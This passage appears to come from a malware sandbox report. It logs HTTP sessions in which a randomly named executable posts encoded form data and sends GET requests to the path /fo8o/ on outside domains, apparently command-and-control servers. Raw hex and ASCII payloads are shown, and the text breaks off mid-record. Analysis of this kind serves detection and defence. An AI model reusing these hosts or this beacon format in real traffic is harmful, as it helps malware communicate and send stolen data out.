66 Data Ascii: OVFPBtpp=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12CRarZebQ6qeGR6bsZV7uz5VCSf
Apr 26, 2024 10:07:55.457580090 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 26 Apr 2024 08:07:55 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49724	85.159.66.93	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:57.930514097 CEST	795	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 53 6c 62 33 4c 44 47 4d 32 32 4a 6f 37 54 73 7a 78 48 50 78 76 45 65 4b 35 51 3d 3d Data Ascii: OVFPBtpp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeSlb3LDGM22Jo7TszxHPxvEeK5Q==
Apr 26, 2024 10:07:58.266541958 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 26 Apr 2024 08:07:58 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49725	85.159.66.93	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:00.741560936 CEST	1808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 61 30 37 2b 45 6d 4b 50 33 48 63 2b 76 79 6b 44 69 48 6d 48 36 46 54 46 69 4a 4a 63 65 38 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c 2b 34 59 76 4e 6e 32 33 74 4a 69 70 78 38 35 2f 72 51 73 62 62 33 74 67 6a 4c 68 79 69 34 67 35 66 65 68 43 53 68 47 37 6f 43 4b 54 55 6e 6c 4f 47 48 37 43 2f 4d 4c 6c 4c 43 46 42 65 70 4e 43 65 6c 77 4c 64 34 46 4c 69 42 6d 75 52 70 57 50 4f 4e 64 75 48 48 35 75 54 70 56 75 76 45 73 77 7a 74 71 58 39 48 30 2f 34 43 39 33 56 35 46 63 69 44 36 6a 68 34 53 36 49 66 75 45 73 62 35 35 30 6d 75 57 6e 63 65 71 6a 70 5a 7a 79 4c 4d 55 69 4c 53 6f 4a 56 71 51 4c 2b 7a 63 57 43 6e 69 77 30 48 68 34 6c 66 53 47 41 52 48 4e 57 64 65 74 4a 55 52 70 62 31 63 4b 63 34 42 6f 72 65 61 48 55 7a 6c 66 6a 6a 70 42 77 48 54 46 62 6b 73 6c 37 41 35 4e 30 63 57 4d 53 57 46 30 2b 61 78 35 6d 43 71 4e 67 38 30 4a 34 31 33 6b 70 5a 47 43 61 58 2f 6d 57 62 4b 51 74 4b 5a 44 2b 4b 44 66 66 69 69 57 43 59 64 51 36 31 41 6f 37 4a 6a 76 66 54 59 61 46 38 44 6b 31 63 32 32 51 46 35 78 50 74 72 2f 46 66 57 53 76 6e 78 39 59 38 2f 56 74 77 50 7a 61 61 32 32 6b 2f 34 6c 55 4a 42 63 6d 58 78 4f 46 74 64 2f 55 51 31 45 61 79 32 30 62 57 53 2b 6c 66 71 2f 33 48 4e 56 32 64 49 7a 6e 66 63 62 75 53 30 5a 7a 58 6b 41 4d 30 6b 63 71 2f 78 31 78 43 39 31 33 49 37 4f 38 35 62 36 49 73 70 32 69 4b 6e 73 32 46 47 30 41 43 44 4f 39 6f 46 32 53 72 39 2f 68 6a 64 41 36 6e 6c 79 6f 72 73 56 6d 78 37 38 30 71 5a 77 67 31 57 53 5a 63 45 72 44 49 6f 75 31 58 4d 45 6d 75 50 76 66 44 50 47 79 53 63 78 6d 43 56 49 68 31 72 63 66 34 33 4e 62 65 53 6f 59 45 64 75 4f 53 6f 72 32 6b 6d 33 70 64 45 4b 47 48 63 6b 6a 53 51 66 71 49 62 31 6c 70 46 75 42 78 44 6f 34 70 4e 48 47 57 38 73 75 5a 2f 73 38 74 52 6b 61 63 74 64 44 57 53 33 30 62 58 6f 55 4a 55 4e 54 4b 73 4b 73 56 4f 4b 53 45 71 7a 52 51 4b 4a 53 2b 5a 6f 30 30 35 50 34 62 63 6e 45 72 2b 43 44 62 73 41 75 45 36 6d 62 72 46 45 77 76 78 2b 4d 50 54 6e 59 44 45 7a 53 37 43 78 2b 6c 49 79 35 6d 51 58 47 6c 73 4a 43 41 36 48 42 6c 67 68 44 65 65 67 70 61 64 63 70 63 47 2f 2b 67 4b 31 5a 65 4a 4e 2b 56 71 4b 6e 64 41 4e 36 71 57 74 77 57 56 76 75 57 4f 6c 2f 61 67 72 6b 32 69 49 38 46 67 4d 5a 74 56 32 41 4d 2f 71 61 52 32 34 4b 43 51 68 39 62 63 65 79 56 35 51 75 64 41 35 69 33 6f 55 39 45 4e 57 49 4f 31 6e 64 34 43 77 2f 38 6f 64 45 59 55 55 4c 44 45 72 78 56 49 6d 61 72 69 6e 2f 53 53 31 75 51 43 56 59 6f 59 6a 4a 41 6f 4a 39 66 55 68 54 57 6e 72 49 79 44 50 33 54 74 6b 32 4c 37 6d 73 79 66 79 76 45 39 6e 66 2f 69 56 4f 78 34 39 78 62 71 44 61 79 39 49 48 32 63 44 74 62 6b 65 58 4d 59 49 77 4a 61 4d 6f 79 66 74 4a 47 38 39 6b 57 31 4b 4b 36 6b 58 49 54 6a 6b 76 75 67 6a 33 54 59 49 2f 4d 72 67 61 53 33 78 6d 4d 38 39 31 44 46 6d 50 65 49 75 49 42 55 41 30 52 59 52 51 56 4e 4e 2b 6a 4c 48 6c 53 4a 74 69 6f 41 55 39 53 55 67 3d Data Ascii: OVFPBtpp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpa07+EmKP3Hc+vykDiHmH6FTFiJJce8r+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs94QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRpWPONduHH5uTpVuvEswztqX9H0/4C93V5FciD6jh4S6IfuEsb550muWnceqjpZzyLMUiLSoJVqQL+zcWCniw0Hh4lfSGARHNWdetJURpb1cKc4BoreaHUzlfjjpBwHTFbksl7A5N0cWMSWF0+ax5mCqNg80J413kpZGCaX/mWbKQtKZD+KDffiiWCYdQ61Ao7JjvfTYaF8Dk1c22QF5xPtr/FfWSvnx9Y8/VtwPzaa22k/4lUJBcmXxOFtd/UQ1Eay20bWS+lfq/3HNV2dIznfcbuS0ZzXkAM0kcq/x1xC913I7O85b6Isp2iKns2FG0ACDO9oF2Sr9/hjdA6nlyorsVmx780qZwg1WSZcErDIou1XMEmuPvfDPGyScxmCVIh1rcf43NbeSoYEduOSor2km3pdEKGHckjSQfqIb1lpFuBxDo4pNHGW8suZ/s8tRkactdDWS30bXoUJUNTKsKsVOKSEqzRQKJS+Zo005P4bcnEr+CDbsAuE6mbrFEwvx+MPTnYDEzS7Cx+lIy5mQXGlsJCA6HBlghDeegpadcpcG/+gK1ZeJN+VqKndAN6qWtwWVvuWOl/agrk2iI8FgMZtV2AM/qaR24KCQh9bceyV5QudA5i3oU9ENWIO1nd4Cw/8odEYUULDErxVImarin/SS1uQCVYoYjJAoJ9fUhTWnrIyDP3Ttk2L7msyfyvE9nf/iVOx49xbqDay9IH2cDtbkeXMYIwJaMoyftJG89kW1KK6kXITjkvugj3TYI/MrgaS3xmM891DFmPeIuIBUA0RYRQVNN+jLHlSJtioAU9SUg=
Apr 26, 2024 10:08:01.085654020 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 26 Apr 2024 08:08:00 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-26T08:08:05.9520127Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49726	85.159.66.93	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:03.550745010 CEST	507	OUT	GET /fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:08:03.830569029 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 26 Apr 2024 08:08:03 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-26T08:08:08.6951174Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49727	91.195.240.94	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:09.294449091 CEST	774	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 38 51 63 4e 41 56 72 43 4d 46 39 71 6d 79 74 67 69 69 54 57 7a 56 31 67 5a 57 Data Ascii: OVFPBtpp=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o98QcNAVrCMF9qmytgiiTWzV1gZW
Apr 26, 2024 10:08:09.538532972 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Fri, 26 Apr 2024 08:08:09 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49728	91.195.240.94	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:12.068526983 CEST	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 7a 79 79 48 51 2b 51 48 6d 4e 4b 69 73 64 33 61 57 72 70 4d 75 51 36 78 53 50 4d 41 3d 3d Data Ascii: OVFPBtpp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzyyHQ+QHmNKisd3aWrpMuQ6xSPMA==
Apr 26, 2024 10:08:12.312338114 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Fri, 26 Apr 2024 08:08:12 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49729	91.195.240.94	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:14.846537113 CEST	1811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 2f 58 6f 6c 49 7a 6d 6f 4b 79 67 64 33 61 76 52 31 66 47 45 79 69 66 6e 59 69 4f 6d 6c 67 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 37 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a 38 66 48 6d 67 52 55 51 37 71 37 35 62 50 53 66 6b 35 44 55 59 47 39 55 42 6f 47 64 69 38 2f 6d 46 2f 78 62 62 35 69 53 42 45 35 4a 59 31 32 64 41 39 61 59 58 65 35 44 47 61 55 43 44 39 61 34 43 32 66 65 69 34 72 4e 4b 64 47 4e 2b 42 75 4f 4f 41 73 34 4c 6b 69 72 35 68 43 32 38 68 32 56 43 57 37 4e 36 33 64 6d 34 50 6b 41 43 7a 75 31 41 42 75 6e 61 4e 73 63 4c 2b 51 74 57 7a 52 30 6e 52 62 6a 4b 38 68 31 77 4d 4e 4e 5a 4b 31 6b 76 63 2f 6d 77 6c 45 51 71 56 4e 38 73 44 71 43 63 6c 76 54 45 41 38 50 51 5a 44 6b 55 71 59 76 41 74 36 62 63 32 75 4d 50 6c 64 57 4d 44 4d 4d 6a 57 4b 6c 6a 70 4e 2b 66 34 33 2b 57 59 70 68 59 44 33 66 72 4a 49 41 30 37 4f 66 51 44 37 71 6b 6b 6c 49 6e 39 41 37 6d 39 46 2b 39 37 44 4d 53 4a 41 55 61 7a 74 41 6a 50 64 68 52 6b 55 70 72 4e 45 5a 30 6c 78 2f 34 4b 44 57 33 46 7a 50 45 6b 49 52 79 4b 31 61 79 38 2b 68 30 2f 44 68 74 42 50 35 77 56 64 69 47 4d 5a 53 66 77 62 55 64 6a 51 42 4f 51 57 50 4a 44 32 45 73 52 50 65 53 2b 6f 30 6d 5a 6e 52 55 44 6d 6c 76 66 32 6a 7a 63 6d 33 7a 67 35 4b 5a 73 61 31 43 6f 2b 6b 72 4e 38 38 55 4f 71 37 50 53 56 39 49 53 39 79 47 53 39 64 57 7a 6b 45 32 38 6a 36 61 55 77 57 33 56 75 45 33 34 59 44 72 67 50 2f 39 50 37 51 38 36 49 65 32 74 2b 66 67 62 36 6e 79 33 48 38 61 4d 64 74 39 73 7a 70 4f 6e 41 50 76 2f 69 74 34 56 39 79 41 34 6e 63 53 61 50 69 6f 62 